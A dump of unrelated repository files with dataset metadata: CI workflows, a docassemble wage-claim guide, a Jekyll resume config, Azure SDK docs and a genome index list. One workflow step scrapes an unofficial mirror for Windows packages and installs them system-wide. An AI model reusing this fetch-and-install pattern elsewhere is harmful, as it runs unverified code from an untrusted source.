on: push: branches: [ main ] pull_request: branches: [ main ] jobs: build: runs-on: windows-latest steps: - uses: actions/checkout@v2 with: fetch-depth: 0 - run: echo "$($pwd.path)\bin" | Out-File -FilePath $env:GITHUB_PATH -Encoding utf8 -Append - name: Install and cache PowerShell modules uses: potatoqualitee/psmodulecache@v4 with: modules-to-cache: powershell-yaml - uses: actions/setup-python@v2 with: python-version: '3.9' cache: 'pip' - run: pip install -r requirements.txt - name: build env: PFX_PASSPHRASE: ${{ secrets.PFX_PASSPHRASE }} PFX_THUMBPRINT: ${{ secrets.PFX_THUMBPRINT }} run: ./build.ps1 -NoGit - uses: actions/upload-artifact@v2 with: name: catalog path: | ./manifests/**/*.yaml ./source.msix ./version.txt test: needs: build runs-on: windows-latest steps: - uses: actions/checkout@v2 - uses: actions/download-artifact@v2 with: name: catalog - name: Install winget run: | $ErrorActionPreference = 'Stop' iwr $(iwr 'https://store.rg-adguard.net/api/GetFiles' -Method 'POST' -ContentType 'application/x-www-form-urlencoded' -Body 'type=PackageFamilyName&url=Microsoft.VCLibs.140.00_8wekyb3d8bbwe&ring=RP&lang=en-US' -UseBasicParsing | Foreach-Object Links | Where-Object outerHTML -match 'Microsoft.VCLibs.140.00_.+_x64__8wekyb3d8bbwe.appx' | Foreach-Object href) -OutFile $env:TEMP\vclibs.appx iwr $(iwr 'https://store.rg-adguard.net/api/GetFiles' -Method 'POST' -ContentType 'application/x-www-form-urlencoded' -Body 'type=PackageFamilyName&url=Microsoft.VCLibs.140.00.UWPDesktop_8wekyb3d8bbwe&ring=RP&lang=en-US' -UseBasicParsing | Foreach-Object Links | Where-Object outerHTML -match 'Microsoft.VCLibs.140.00.UWPDesktop_.+_x64__8wekyb3d8bbwe.appx' | Foreach-Object href) -OutFile $env:TEMP\vclibsuwp.appx iwr 'https://github.com/microsoft/winget-cli/releases/download/v1.1.12653/Microsoft.DesktopAppInstaller_8wekyb3d8bbwe.msixbundle' -OutFile $env:TEMP\winget.msixbundle iwr 'https://github.com/microsoft/winget-cli/releases/download/v1.1.12653/9c0fe2ce7f8e410eb4a8f417de74517e_License1.xml' -Outfile $env:TEMP\winget.license Add-AppxProvisionedPackage -Online -PackagePath $env:TEMP\winget.msixbundle -LicensePath $env:TEMP\winget.license -DependencyPackagePath @("$env:TEMP\vclibs.appx", "$env:TEMP\vclibsuwp.appx") - name: validate run: ./validate.ps1 build-release: needs: test runs-on: windows-latest if: github.ref == 'refs/heads/main' steps: - uses: actions/checkout@v2 with: fetch-depth: 0 - run: echo "$($pwd.path)\bin" | Out-File -FilePath $env:GITHUB_PATH -Encoding utf8 -Append - name: Install and cache PowerShell modules uses: potatoqualitee/psmodulecache@v4 with: modules-to-cache: powershell-yaml - uses: actions/setup-python@v2 with: python-version: '3.9' cache: 'pip' - run: pip install -r requirements.txt - name: install AzureSignTool run: dotnet tool install --global AzureSignTool --version 3.0.0 - name: build and sign env: AZURE_SIGN_CLIENT_SECRET: ${{ secrets.AZURE_SIGN_CLIENT_SECRET }} run: ./build.ps1 -NoGit -Release - uses: actions/upload-artifact@v2 with: name: catalog-release path: | ./manifests/**/*.yaml ./source.msix ./version.txt release: needs: build-release runs-on: ubuntu-latest if: github.ref == 'refs/heads/main' steps: - uses: actions/checkout@v2 with: ref: "gh-pages" fetch-depth: 0 - name: Set git config run: | git config --local user.email "action@github.com" git config --local user.name "GitHub Action" - uses: actions/download-artifact@v2 with: name: catalog-release - name: Commit changes run: | git add source.msix git add manifests/ git commit -m "new index published" - name: Push changes uses: ad-m/github-push-action@master with: github_token: ${{ secrets.GITHUB_TOKEN }} branch: "gh-pages"
32.985401
423
0.620934
63739d60f4139544d816bd392989f8ecbbfc6896
1,043
yml
YAML
.github/workflows/golang-algorithm-club.yml
christin-wednesday/golang-algorithm-club
3495f8fc3d38251c4d3926516a2fb23b740821f1
[ "MIT" ]
null
null
null
.github/workflows/golang-algorithm-club.yml
christin-wednesday/golang-algorithm-club
3495f8fc3d38251c4d3926516a2fb23b740821f1
[ "MIT" ]
null
null
null
.github/workflows/golang-algorithm-club.yml
christin-wednesday/golang-algorithm-club
3495f8fc3d38251c4d3926516a2fb23b740821f1
[ "MIT" ]
null
null
null
name: Golang Algorithm Club on: push: branches: [ master ] pull_request: branches: [ master ] jobs: golangci: name: lint runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - name: golangci-lint uses: golangci/golangci-lint-action@v1 with: version: v1.30 pre-commit: runs-on: ubuntu-latest steps: - name: Install pre-commit dependencies run: | chmod +x ./cmd/pre-commit-setup.sh ./cmd/pre-commit-setup.sh - uses: actions/checkout@v2 - uses: actions/setup-python@v2 - uses: pre-commit/action@v2.0.0 test: strategy: matrix: go-version: [1.13.x, 1.14.x] platform: [ubuntu-latest, macos-latest, windows-latest] runs-on: ${{ matrix.platform }} steps: - name: Install Go uses: actions/setup-go@v2 with: go-version: ${{ matrix.go-version }} - name: Checkout code uses: actions/checkout@v2 - name: Test run: go test ./...
24.255814
63
0.569511
639822a323633a19b01f899b7ced0eee8020cd10
4,475
yml
YAML
docassemble/LLAW33012021S1WWC1/data/questions/WWC1.endpoints.yml
LLAW3301/docassemble-LLAW33012021S1WWC1
e7bf8de7daebbe498cd2256cd9ae1c56bff1cec1
[ "MIT" ]
2
2021-04-09T02:35:37.000Z
2021-04-22T06:16:04.000Z
docassemble/LLAW33012021S1WWC1/data/questions/WWC1.endpoints.yml
LLAW3301/docassemble-LLAW33012021S1WWC1
e7bf8de7daebbe498cd2256cd9ae1c56bff1cec1
[ "MIT" ]
null
null
null
docassemble/LLAW33012021S1WWC1/data/questions/WWC1.endpoints.yml
LLAW3301/docassemble-LLAW33012021S1WWC1
e7bf8de7daebbe498cd2256cd9ae1c56bff1cec1
[ "MIT" ]
null
null
null
# summary document available for dl and email with link # to the SAET forms page --- include: - WWC1.questions.yml - WWC1.casual.yml --- objects: - endpoints: DADict --- event: endpoints['filled_in'] question: Your Document is Ready! subquestion: | Thank you for using this guide ${ first_name + ' '+ last_name }. Below is a downloadable docx file of WWC Money Claim Guide that contains the data you have given us. The document will also contain the calculations for the difference between what you have been paid and what you are entitled to according to your award. You may wish to view these calculations below. Please send a copy of the document to the advising WWC industrial officer through the email option below. attachment: name: WWC Summary Document docx template file: WWC_FORM.docx valid formats: - docx under: | We have collected the following data from you: Your Details|Your Input -----|---- First Name|${first_name} Last Name|${last_name} Consulted an Industrial Worker at WWC|${consult_WWC} Name of award|${the_award} Employeement status and details|Your Input ----|---- Employee Status|${work_status} %if work_status == 'Casual': Regular hours|${regular_hours} %endif %if work_status == 'Full-Time' or work_status == 'Part-Time' or regular_hours == 'Yes': How many hours worked|${hours_week} Amount per hour|${currency(paid_hour)} Award Amount per hour|${currency(award_paid_hour)} Difference|${currency(rtDifference)} %endif %if work_status == 'Casual' and regular_hours == 'No': Casual Hours| %for item in casualHours: Week Starting|${item.name} Hours Worked|${item.hours} Hourly Pay Rate|${currency(item.pay)} Award Pay Rate|${currency(item.award)} Difference|${currency(item.difference)} %endfor %endif %if paid_overtime == 'Yes': Overtime|Your Input ----|---- Hours in Overtime|${hours_overtime} Amount of Overtime|${currency(amount_overtime)} Overtime Rates in Award|${currency(overtime_award)} Difference|${currency(otDifference)} %endif %if penalty_rates == 'Yes': Penalty Rates|Your Input ----|---- %for rate in penRates: **What Penalty Rate**|**${rate.name}** The amount of penalty rates|${currency(rate.paid_rates)} Award Penalty Rates|${currency(rate.penRateAward)} Difference|${currency(rate.difference)} %endfor %endif %if what_allowance == 'Yes': Allowances|Your Input ----|---- %for allowance in allowances: **The Allowance**|**${allowance.name}** The Allowance Amount|${currency(allowance.amount_allowance)} Award Allowance Amount|${currency(allowance.allowance_award)} Difference|${currency(allowance.difference)} %endfor %endif %if public_holiday_rates == 'Yes': Public Holidays|Your Input ----|---- %for day in pubHol: **The Public Holiday**|**${day.name}** Amount of Public Holiday Rates|${currency(day.paid_public_holiday_rates)} Public Holiday Rates in Award|${currency(day.public_holiday_award)} Difference|${currency(day.difference)} %endfor %endif %if work_status == 'Full-Time' or work_status == 'Part-Time': %if leave_entitlement == 'Yes': %if leave_owing == 'Yes': Leave|Your Input ----|---- How much leave is owed|${currency(leave_owed)} %endif %endif %endif %if other_payment == 'Yes': Other Payments|Your Input ----|---- %for others in otherPayment: **Other Payment Type**|**${others.name}** The amount of other payment|${currency(others.amount)} Amount Owed |${currency(others.amount_award)} Difference|${currency(others.difference)} %endfor %endif buttons: - I wish to restart: restart - Exit: exit url: https://wwcsa.org.au/ - SAET Website: exit url: https://www.saet.sa.gov.au/forms/ --- event: endpoints['not_filled_in'] question: You do not know your award subquestion: | You need to know what your relevant award is in order to use this guide. Please visit the <a target="_self" href="https://www.fairwork.gov.au/awards-and-agreements/awards/find-my-award/">Australian Goverment Fair Work Ombudsman website</a> to find out what your award is before returning to complete this guide. Alternatively, you can contact a WWC industrial officer for further assistance. To exit out of this guide, please press exit. buttons: - I wish to restart: restart - Exit: exit - Contact the Working Women's Centre: exit url: https://wwcsa.org.au/ ---
30.033557
314
0.700782
c0219618e962731ea8794e776d74bda0653c3acb
2,606
yml
YAML
_config.yml
rahulvk007/resume
5d2ec462b11a5d7b6bc2f71422457ac1f32983b9
[ "MIT" ]
null
null
null
_config.yml
rahulvk007/resume
5d2ec462b11a5d7b6bc2f71422457ac1f32983b9
[ "MIT" ]
null
null
null
_config.yml
rahulvk007/resume
5d2ec462b11a5d7b6bc2f71422457ac1f32983b9
[ "MIT" ]
null
null
null
# Site settings title: "Rahul Vijayakumar's Resume" description: "A resume template for Jekyll and GitHub Pages sites." # Build settings markdown: kramdown sass: sass_dir: _sass style: compressed # Resume settings resume_avatar: "true" resume_name: "Rahul Vijayakumar" resume_title: "Student at VIT Chennai" # used for the contact button in _layouts/resume.html resume_contact_email: "rahulvijayakumarpt4551@gmail.com" # the next two items are used for schema itemprops in _layouts/resume.html resume_contact_telephone: "" resume_contact_address: "Kerala, India" resume_header_contact_info: "Kerala, India • • rahulvijayakumarpt4551@gmail.com" display_header_contact_info: "false" resume_header_intro: "<p>To work as a developer at a reputed product based company where I can apply my skills and work on the latest cutting edge areas of computer science. I want to develop and deploy applications in AI and Machine learning related domains.</p>" # use "yes" to display the email contact button, # "no" to display an "I'm not looking for work" message, # or remove the resume_looking_for_work option entirely # to leave blank resume_looking_for_work: "yes" # Decide which sections to use # comment out to hide resume_section_techskills: true resume_section_education: true resume_section_projects: true resume_section_skills: true resume_section_recognition: true resume_section_links: true resume_section_cocurriculars: true resume_section_interests: true resume_section_certifications: true resume_section_areasofinterest: true # Resume social links # uncomment the options you wish to display, and add your own URL resume_social_links: resume_github_url: "https://github.com/rahulvk007" #resume_twitter_url: "http://twitter.com/jglovier" #resume_dribbble_url: "https://dribbble.com/jag" # resume_facebook_url: "insert Facebook URL here" # resume_linkedin_url: "https://www.linkedin.com/in/joelglovier" resume_instagram_url: "https://www.instagram.com/rahul.vk007/" resume_website_url: "https://www.youtube.com/channel/UC3Ez_M6LDv0whyRkz0xdJ7Q" # resume_medium_url: "https://medium.com/@jglovier" resume_print_social_links: true # Design settings resume_theme: default # Note: when editing locally, remember to restart # your Jekyll server when you edit this file. Changes # to _config.yml are only recognized when the server starts
39.484848
264
0.729087
b1c9c9cb7783638fc03901527a13a51cb4b44a39
62
yml
YAML
data/sponsors/datacentrics.yml
adzuci/devopsdays-web
aac92777aa15fafb77df084a57c08d1ac559ed30
[ "Apache-2.0", "MIT" ]
149
2015-11-10T22:23:49.000Z
2022-03-09T20:48:22.000Z
data/sponsors/datacentrics.yml
adzuci/devopsdays-web
aac92777aa15fafb77df084a57c08d1ac559ed30
[ "Apache-2.0", "MIT" ]
2,534
2015-11-10T21:56:39.000Z
2022-03-31T20:26:29.000Z
data/sponsors/datacentrics.yml
adzuci/devopsdays-web
aac92777aa15fafb77df084a57c08d1ac559ed30
[ "Apache-2.0", "MIT" ]
1,014
2016-02-12T02:20:38.000Z
2022-03-31T17:38:48.000Z
name: "datacentrics" url: "https://datacentricscloud.com.br/"
20.666667
40
0.741935
0831656c7840e1a36410e4b981ecea6743c84b1d
2,574
yml
YAML
preview/docs-ref-autogen/com.azure.resourcemanager.eventgrid.fluent.models.PartnerNamespaceInner.yml
azure-sdk/azure-docs-sdk-java
66cc376be8bb1e1246731b879cc1f8fba76ea946
[ "CC-BY-4.0", "MIT" ]
5
2021-08-20T15:24:19.000Z
2022-02-20T17:06:14.000Z
preview/docs-ref-autogen/com.azure.resourcemanager.eventgrid.fluent.models.PartnerNamespaceInner.yml
azure-sdk/azure-docs-sdk-java
66cc376be8bb1e1246731b879cc1f8fba76ea946
[ "CC-BY-4.0", "MIT" ]
null
null
null
preview/docs-ref-autogen/com.azure.resourcemanager.eventgrid.fluent.models.PartnerNamespaceInner.yml
azure-sdk/azure-docs-sdk-java
66cc376be8bb1e1246731b879cc1f8fba76ea946
[ "CC-BY-4.0", "MIT" ]
1
2021-08-20T15:24:21.000Z
2021-08-20T15:24:21.000Z
### YamlMime:JavaType uid: "com.azure.resourcemanager.eventgrid.fluent.models.PartnerNamespaceInner" fullName: "com.azure.resourcemanager.eventgrid.fluent.models.PartnerNamespaceInner" name: "PartnerNamespaceInner" nameWithType: "PartnerNamespaceInner" summary: "EventGrid Partner Namespace." inheritances: - "<xref href=\"java.lang.Object\" data-throw-if-not-resolved=\"False\" />" - "<xref href=\"com.azure.core.management.ProxyResource\" data-throw-if-not-resolved=\"False\" />" - "<xref href=\"com.azure.core.management.Resource\" data-throw-if-not-resolved=\"False\" />" inheritedMembers: - "com.azure.core.management.ProxyResource.id()" - "com.azure.core.management.ProxyResource.name()" - "com.azure.core.management.ProxyResource.type()" - "com.azure.core.management.Resource.location()" - "com.azure.core.management.Resource.tags()" - "com.azure.core.management.Resource.withLocation(java.lang.String)" - "com.azure.core.management.Resource.withTags(java.util.Map<java.lang.String,java.lang.String>)" - "java.lang.Object.clone()" - "java.lang.Object.equals(java.lang.Object)" - "java.lang.Object.finalize()" - "java.lang.Object.getClass()" - "java.lang.Object.hashCode()" - "java.lang.Object.notify()" - "java.lang.Object.notifyAll()" - "java.lang.Object.toString()" - "java.lang.Object.wait()" - "java.lang.Object.wait(long)" - "java.lang.Object.wait(long,int)" syntax: "public class PartnerNamespaceInner extends Resource" constructors: - "com.azure.resourcemanager.eventgrid.fluent.models.PartnerNamespaceInner.PartnerNamespaceInner()" methods: - "com.azure.resourcemanager.eventgrid.fluent.models.PartnerNamespaceInner.endpoint()" - "com.azure.resourcemanager.eventgrid.fluent.models.PartnerNamespaceInner.partnerRegistrationFullyQualifiedId()" - "com.azure.resourcemanager.eventgrid.fluent.models.PartnerNamespaceInner.provisioningState()" - "com.azure.resourcemanager.eventgrid.fluent.models.PartnerNamespaceInner.systemData()" - "com.azure.resourcemanager.eventgrid.fluent.models.PartnerNamespaceInner.validate()" - "com.azure.resourcemanager.eventgrid.fluent.models.PartnerNamespaceInner.withLocation(java.lang.String)" - "com.azure.resourcemanager.eventgrid.fluent.models.PartnerNamespaceInner.withPartnerRegistrationFullyQualifiedId(java.lang.String)" - "com.azure.resourcemanager.eventgrid.fluent.models.PartnerNamespaceInner.withTags(java.util.Map<java.lang.String,java.lang.String>)" type: "class" metadata: {} package: "com.azure.resourcemanager.eventgrid.fluent.models" artifact: com.azure.resourcemanager:azure-resourcemanager-eventgrid:1.0.0-beta.2
55.956522
134
0.794872
a0f1e949cd1e16e5d21c19eeab626444bb744559
1,518
yml
YAML
lists/hg38-list.yml
mtangaro/galaxy-reference-data-repository
1f4d5f844f1613e99e9f2c4d00a5a0fe559749c7
[ "Apache-2.0" ]
null
null
null
lists/hg38-list.yml
mtangaro/galaxy-reference-data-repository
1f4d5f844f1613e99e9f2c4d00a5a0fe559749c7
[ "Apache-2.0" ]
null
null
null
lists/hg38-list.yml
mtangaro/galaxy-reference-data-repository
1f4d5f844f1613e99e9f2c4d00a5a0fe559749c7
[ "Apache-2.0" ]
null
null
null
--- genomes: - genome: 'hg38' tools: - tool: 'bowtie-index' parts: - part: 'hg38.1.ebwt' - part: 'hg38.2.ebwt' - part: 'hg38.3.ebwt' - part: 'hg38.4.ebwt' - part: 'hg38.rev.1.ebwt' - part: 'hg38.rev.2.ebwt' - tool: 'bowtie2' parts: - part: 'hg38.1.bt2' - part: 'hg38.2.bt2' - part: 'hg38.3.bt2' - part: 'hg38.4.bt2' - part: 'hg38.rev.1.bt2' - part: 'hg38.rev.2.bt2' - tool: 'bwa_index' parts: - part: 'hg38.amb' - part: 'hg38.ann' - part: 'hg38.bwt' - part: 'hg38.pac' - part: 'hg38.rbwt' - part: 'hg38.rpac' - part: 'hg38.rsa' - part: 'hg38.sa' - tool: 'liftover' parts: - part: 'hg38ToHg19.over.chain' - part: 'hg38ToMm10.over.chain' - tool: 'rsem' parts: - part: 'hg38.1.ebwt' - part: 'hg38.2.ebwt' - part: 'hg38.3.ebwt' - part: 'hg38.4.ebwt' - part: 'hg38.chrlist' - part: 'hg38.grp' - part: 'hg38.idx.fa' - part: 'hg38.refseq.gtf' - part: 'hg38.rev.1.ebwt' - part: 'hg38.rev.2.ebwt' - part: 'hg38.seq' - part: 'hg38.ti' - part: 'hg38.transcripts.fa' - part: 'hg38_gene_to_tr.txt' others: - other: 'genome.fa' - other: 'genome.fa.fai' - other: 'hg38.2bit'
27.6
41
0.431489
61f03e2778e187cf006990912c20c7c72ba38431
794
yaml
YAML
_data/eldos-corporation-homepage.yaml
api-network/organizations
a6c87f20aa4b44dee7a48d52506e25cf8e6556da
[ "Apache-2.0" ]
4
2021-02-19T03:02:53.000Z
2022-03-23T07:51:17.000Z
_data/eldos-corporation-homepage.yaml
api-network/organizations
a6c87f20aa4b44dee7a48d52506e25cf8e6556da
[ "Apache-2.0" ]
null
null
null
_data/eldos-corporation-homepage.yaml
api-network/organizations
a6c87f20aa4b44dee7a48d52506e25cf8e6556da
[ "Apache-2.0" ]
3
2021-02-19T03:02:59.000Z
2021-10-03T22:25:23.000Z
--- name: EldoS Corporation homepage description: EldoS specializes in development of security-related software components for low-level data protection, secure storage, and transfer. Founded in 1998 the EldoS family of security products are used in over 70 countries by a number of small to large-scale companies and organizations, including financial and military institutions. image: "" created: "2021-02-04" modified: "2021-02-04" specificationVersion: "0.14" x-rank: "7" x-alexaRank: "3422929" url: https://raw.githubusercontent.com/api-network/organizations/main/eldos-corporation-homepage.yaml tags: - Software apis: [] x-common: - type: x-website url: https://www.eldos.com include: [] maintainers: - FN: Kin Lane x-twitter: apievangelist email: info@apievangelist.com ---
31.76
101
0.768262
bf78a7220038885005036092db96a313a557f99e
3,550
yml
YAML
.github/workflows/validate.yml
417-72KI/Docker-Danger-SwiftLint
12d35027da648cf74c53c4b0c95f1fc22132da2c
[ "MIT" ]
null
null
null
.github/workflows/validate.yml
417-72KI/Docker-Danger-SwiftLint
12d35027da648cf74c53c4b0c95f1fc22132da2c
[ "MIT" ]
null
null
null
.github/workflows/validate.yml
417-72KI/Docker-Danger-SwiftLint
12d35027da648cf74c53c4b0c95f1fc22132da2c
[ "MIT" ]
null
null
null
name: Validate Dockerfile on: pull_request: paths: - '.github/workflows/docker_hub.yml' - '.github/workflows/validate.yml' - '**/Dockerfile' - '.github/matrix.json' env: DOCKER_USER: 41772ki DOCKER_PASS: ${{ secrets.DOCKER_PASS }} DOCKER_REPO: danger-swiftlint jobs: generate-matrix: name: Generate matrix runs-on: ubuntu-latest outputs: matrix: ${{ steps.set-matrix.outputs.matrix }} steps: - uses: actions/checkout@v3 - id: set-matrix run: | matrix=$(cat .github/matrix.json | jq -c .) echo "::set-output name=matrix::$matrix" validate: needs: generate-matrix strategy: fail-fast: false matrix: swift_version: ${{ fromJson(needs.generate-matrix.outputs.matrix).swift_version }} runs-on: ubuntu-latest concurrency: group: ${{ github.head_ref }}-${{ github.workflow }}-${{ matrix.swift_version }} cancel-in-progress: true steps: - uses: actions/checkout@v3 - id: set-swiftlint-version name: Set SwiftLint Version run: | swiftlint_version=$(echo '${{ needs.generate-matrix.outputs.matrix }}' | jq -c '.swiftlint_supported_version' | jq -r '.["${{ matrix.swift_version }}"]') echo "::set-output name=swiftlint-version::$swiftlint_version" - name: Set up QEMU uses: docker/setup-qemu-action@v2 with: image: tonistiigi/binfmt:latest platforms: all - name: Set up Docker Buildx uses: docker/setup-buildx-action@v2 - name: Build Docker image id: build-image uses: docker/build-push-action@v3 with: push: false load: true tags: ${{ env.DOCKER_USER }}/${{ env.DOCKER_REPO }}:${{ matrix.swift_version }} build-args: | SWIFT_VERSION=${{ matrix.swift_version }} SWIFT_LINT_REVISION=${{ steps.set-swiftlint-version.outputs.swiftlint-version }} - name: Print Versions run: | IMAGE_ID="$(echo ${{ steps.build-image.outputs.imageid }} | sed -r 's/:/ /g' | awk '{ print $NF }')" docker run --entrypoint show-versions "$IMAGE_ID" - name: Run with sample Dangerfile.swift on latest Swift version if: ${{ matrix.swift_version == fromJson(needs.generate-matrix.outputs.matrix).swift_version[0] }} run: | IMAGE_ID="$(echo ${{ steps.build-image.outputs.imageid }} | sed -r 's/:/ /g' | awk '{ print $NF }')" docker run \ -e GITHUB_WORKFLOW="${GITHUB_WORKFLOW}" \ -e GITHUB_RUN_ID="${GITHUB_RUN_ID}" \ -e GITHUB_RUN_NUMBER="${GITHUB_RUN_NUMBER}" \ -e GITHUB_ACTION="${GITHUB_ACTION}" \ -e GITHUB_ACTIONS="${GITHUB_ACTIONS}" \ -e GITHUB_ACTOR="${GITHUB_ACTOR}" \ -e GITHUB_REPOSITORY="${GITHUB_REPOSITORY}" \ -e GITHUB_EVENT_NAME="${GITHUB_EVENT_NAME}" \ -e GITHUB_EVENT_PATH="${GITHUB_EVENT_PATH}" \ -e GITHUB_WORKSPACE="${GITHUB_WORKSPACE}" \ -e GITHUB_SHA="${GITHUB_SHA}" \ -e GITHUB_REF="${GITHUB_REF}" \ -e GITHUB_HEAD_REF="${GITHUB_HEAD_REF}" \ -e GITHUB_BASE_REF="${GITHUB_BASE_REF}" \ -e GITHUB_TOKEN="${{ secrets.GITHUB_TOKEN }}" \ -v /github:/github \ -v "${GITHUB_EVENT_PATH}":"${GITHUB_EVENT_PATH}" \ -v "${GITHUB_WORKSPACE}":"${GITHUB_WORKSPACE}" \ -w "${GITHUB_WORKSPACE}" \ "${IMAGE_ID}"
40.340909
163
0.584225
dff594810b868498bdfd32e4084150208b57618e
134
yaml
YAML
argocd-root-kustomize/jaeger/kustomization.yaml
DonatoVerardi/hello-kafka
552d9b3b24ee86c6a6e2acf0683973a888abe862
[ "Apache-2.0" ]
null
null
null
argocd-root-kustomize/jaeger/kustomization.yaml
DonatoVerardi/hello-kafka
552d9b3b24ee86c6a6e2acf0683973a888abe862
[ "Apache-2.0" ]
null
null
null
argocd-root-kustomize/jaeger/kustomization.yaml
DonatoVerardi/hello-kafka
552d9b3b24ee86c6a6e2acf0683973a888abe862
[ "Apache-2.0" ]
null
null
null
apiVersion: kustomize.config.k8s.io/v1beta1 kind: Kustomization namespace: argocd resources: - app-jaeger.yaml - prj-jaeger.yaml
16.75
43
0.776119
5faf664f7f9c8ee03c541686b8d6b2595cd44bb0
12,159
yml
YAML
docs-ref-autogen/com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.yml
v-xuto/azure-docs-sdk-java
c3765cc8a28d7f8114193365cdd8eb38ad4b5057
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs-ref-autogen/com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.yml
v-xuto/azure-docs-sdk-java
c3765cc8a28d7f8114193365cdd8eb38ad4b5057
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs-ref-autogen/com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.yml
v-xuto/azure-docs-sdk-java
c3765cc8a28d7f8114193365cdd8eb38ad4b5057
[ "CC-BY-4.0", "MIT" ]
null
null
null
### YamlMime:ManagedReference items: - uid: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys" id: "StreamingPolicyContentKeys" parent: "com.microsoft.azure.management.mediaservices.v2018_07_01" children: - "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.StreamingPolicyContentKeys()" - "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.defaultKey()" - "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.keyToTrackMappings()" - "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.withDefaultKey(com.microsoft.azure.management.mediaservices.v2018_07_01.DefaultKey)" - "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.withKeyToTrackMappings(java.util.List<com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKey>)" langs: - "java" name: "StreamingPolicyContentKeys" nameWithType: "StreamingPolicyContentKeys" fullName: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys" type: "Class" package: "com.microsoft.azure.management.mediaservices.v2018_07_01" summary: "Class to specify properties of all content keys in Streaming Policy." syntax: content: "public class StreamingPolicyContentKeys" inheritance: - "java.lang.Object" inheritedMembers: - "java.lang.Object.clone()" - "java.lang.Object.equals(java.lang.Object)" - "java.lang.Object.finalize()" - "java.lang.Object.getClass()" - "java.lang.Object.hashCode()" - "java.lang.Object.notify()" - "java.lang.Object.notifyAll()" - "java.lang.Object.toString()" - "java.lang.Object.wait()" - "java.lang.Object.wait(long)" - "java.lang.Object.wait(long,int)" - uid: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.StreamingPolicyContentKeys()" id: "StreamingPolicyContentKeys()" parent: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys" langs: - "java" name: "StreamingPolicyContentKeys()" nameWithType: "StreamingPolicyContentKeys.StreamingPolicyContentKeys()" fullName: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.StreamingPolicyContentKeys()" overload: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.StreamingPolicyContentKeys*" type: "Constructor" package: "com.microsoft.azure.management.mediaservices.v2018_07_01" syntax: content: "public StreamingPolicyContentKeys()" - uid: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.defaultKey()" id: "defaultKey()" parent: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys" langs: - "java" name: "defaultKey()" nameWithType: "StreamingPolicyContentKeys.defaultKey()" fullName: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.defaultKey()" overload: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.defaultKey*" type: "Method" package: "com.microsoft.azure.management.mediaservices.v2018_07_01" summary: "Get default content key for an encryption scheme." syntax: content: "public DefaultKey defaultKey()" return: type: "com.microsoft.azure.management.mediaservices.v2018_07_01.DefaultKey" description: "the defaultKey value" - uid: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.keyToTrackMappings()" id: "keyToTrackMappings()" parent: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys" langs: - "java" name: "keyToTrackMappings()" nameWithType: "StreamingPolicyContentKeys.keyToTrackMappings()" fullName: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.keyToTrackMappings()" overload: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.keyToTrackMappings*" type: "Method" package: "com.microsoft.azure.management.mediaservices.v2018_07_01" summary: "Get representing tracks needs separate content key." syntax: content: "public List<StreamingPolicyContentKey> keyToTrackMappings()" return: type: "java.util.List<com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKey>" description: "the keyToTrackMappings value" - uid: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.withDefaultKey(com.microsoft.azure.management.mediaservices.v2018_07_01.DefaultKey)" id: "withDefaultKey(com.microsoft.azure.management.mediaservices.v2018_07_01.DefaultKey)" parent: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys" langs: - "java" name: "withDefaultKey(DefaultKey defaultKey)" nameWithType: "StreamingPolicyContentKeys.withDefaultKey(DefaultKey defaultKey)" fullName: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.withDefaultKey(DefaultKey defaultKey)" overload: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.withDefaultKey*" type: "Method" package: "com.microsoft.azure.management.mediaservices.v2018_07_01" summary: "Set default content key for an encryption scheme." syntax: content: "public StreamingPolicyContentKeys withDefaultKey(DefaultKey defaultKey)" parameters: - id: "defaultKey" type: "com.microsoft.azure.management.mediaservices.v2018_07_01.DefaultKey" description: "the defaultKey value to set" return: type: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys" description: "the StreamingPolicyContentKeys object itself." - uid: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.withKeyToTrackMappings(java.util.List<com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKey>)" id: "withKeyToTrackMappings(java.util.List<com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKey>)" parent: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys" langs: - "java" name: "withKeyToTrackMappings(List<StreamingPolicyContentKey> keyToTrackMappings)" nameWithType: "StreamingPolicyContentKeys.withKeyToTrackMappings(List<StreamingPolicyContentKey> keyToTrackMappings)" fullName: 